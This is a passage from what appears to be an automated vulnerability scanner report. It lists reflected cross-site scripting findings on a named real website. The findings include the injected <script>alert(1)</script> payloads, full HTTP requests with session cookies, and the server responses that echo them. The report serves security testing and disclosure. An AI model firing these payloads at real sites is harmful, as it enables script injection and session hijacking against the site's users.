User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/3f9d9<script>alert(1)</script>92818c4536 was not found on this server.</p>
...[SNIP]...

2.1655. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 133ac<script>alert(1)</script>36a2c5b4540 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail133ac<script>alert(1)</script>36a2c5b4540/20/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail133ac<script>alert(1)</script>36a2c5b4540/20/rating.php was not found on this server.</p>
...[SNIP]...

2.1656. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b0ad<script>alert(1)</script>f115350e281141fba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail6b0ad<script>alert(1)</script>f115350e281141fba/20/rating.php?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6b0ad<script>alert(1)</script>f115350e281141fba/20/rating.php?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1657. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b62b3<script>alert(1)</script>b890b7c8af14a8beb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/20b62b3<script>alert(1)</script>b890b7c8af14a8beb/rating.php?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20b62b3<script>alert(1)</script>b890b7c8af14a8beb/rating.php?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1658. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66ab0<script>alert(1)</script>97554091c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2066ab0<script>alert(1)</script>97554091c5f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2066ab0<script>alert(1)</script>97554091c5f/rating.php was not found on this server.</p>
...[SNIP]...

2.1659. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cbcc4<script>alert(1)</script>69bb9f4d99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/rating.phpcbcc4<script>alert(1)</script>69bb9f4d99 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.phpcbcc4<script>alert(1)</script>69bb9f4d99 was not found on this server.</p>
...[SNIP]...

2.1660. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7ab9a<script>alert(1)</script>e2f1771785e146508 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/20/rating.php7ab9a<script>alert(1)</script>e2f1771785e146508?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.php7ab9a<script>alert(1)</script>e2f1771785e146508?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1661. http://www.resellerbase.com/detail/20/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f1b9<script>alert(1)</script>39204903d79b45566 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/20/rating.php/9f1b9<script>alert(1)</script>39204903d79b45566?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.php/9f1b9<script>alert(1)</script>39204903d79b45566?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1662. http://www.resellerbase.com/detail/20/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dafd5<script>alert(1)</script>c9a9a91f844 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/rating.php?dafd5<script>alert(1)</script>c9a9a91f844=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.php?dafd5<script>alert(1)</script>c9a9a91f844=1 was not found on this server.</p>
...[SNIP]...

2.1663. http://www.resellerbase.com/detail/20/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50831<script>alert(1)</script>fe145bf4630 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50831<script>alert(1)</script>fe145bf4630/20/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50831<script>alert(1)</script>fe145bf4630/20/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1664. http://www.resellerbase.com/detail/20/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96c4d<script>alert(1)</script>4c4c5e5479f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2096c4d<script>alert(1)</script>4c4c5e5479f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2096c4d<script>alert(1)</script>4c4c5e5479f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1665. http://www.resellerbase.com/detail/20/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14b3b<script>alert(1)</script>def4e103be0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/search.php14b3b<script>alert(1)</script>def4e103be0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php14b3b<script>alert(1)</script>def4e103be0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1666. http://www.resellerbase.com/detail/20/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 711da<a>e3c023103fe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search711da<a>e3c023103fe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...&Submit3=Search711da<a>e3c023103fe&opt=2 was not found on this server.</p>
...[SNIP]...

2.1667. http://www.resellerbase.com/detail/20/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ed9fe<a>ee45a20e268 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/search.php?keyword=search...ed9fe<a>ee45a20e268&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...ed9fe<a>ee45a20e268&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1668. http://www.resellerbase.com/detail/20/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e548e<script>alert(1)</script>f622048bffe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search&opt=2&e548e<script>alert(1)</script>f622048bffe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...&Submit3=Search&opt=2&e548e<script>alert(1)</script>f622048bffe=1 was not found on this server.</p>
...[SNIP]...

2.1669. http://www.resellerbase.com/detail/20/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7a307<a>ad5df2ebc32 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search&opt=27a307<a>ad5df2ebc32 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...&Submit3=Search&opt=27a307<a>ad5df2ebc32 was not found on this server.</p>
...[SNIP]...

2.1670. http://www.resellerbase.com/detail/20/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb148<script>alert(1)</script>ed71c759f2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaileb148<script>alert(1)</script>ed71c759f2c/20/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaileb148<script>alert(1)</script>ed71c759f2c/20/themes/ was not found on this server.</p>
...[SNIP]...

2.1671. http://www.resellerbase.com/detail/20/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e02eb<script>alert(1)</script>3fa5db7203d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20e02eb<script>alert(1)</script>3fa5db7203d/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20e02eb<script>alert(1)</script>3fa5db7203d/themes/ was not found on this server.</p>
...[SNIP]...

2.1672. http://www.resellerbase.com/detail/20/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cf6ac<script>alert(1)</script>7de78a31870 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themescf6ac<script>alert(1)</script>7de78a31870/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themescf6ac<script>alert(1)</script>7de78a31870/ was not found on this server.</p>
...[SNIP]...

2.1673. http://www.resellerbase.com/detail/20/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f82e<script>alert(1)</script>dd281557825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/?3f82e<script>alert(1)</script>dd281557825=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
